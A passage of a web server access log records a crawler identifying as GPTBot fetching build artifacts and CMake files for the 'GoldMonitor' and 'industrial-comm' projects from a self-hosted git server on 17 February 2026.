9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 13192929] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47680] [Gzip 26.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47687] [Gzip 26.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101235] [Gzip 29.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38620] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 70895] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11619] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 69020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 70861] [Gzip 17.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 72030] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72043] [Gzip 17.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11061] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" -[17/Feb/2026:16:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 70838] [Gzip 17.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11044] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100038] [Gzip 29.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10201] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10428] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101201] [Gzip 29.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99745] [Gzip 29.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 100857] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" -[17/Feb/2026:16:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 12909105] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100072] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:16:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 49770] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17035] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -[17/Feb/2026:16:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11900] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" -[17/Feb/2026:16:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" -[17/Feb/2026:16:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -[17/Feb/2026:16:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38615] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 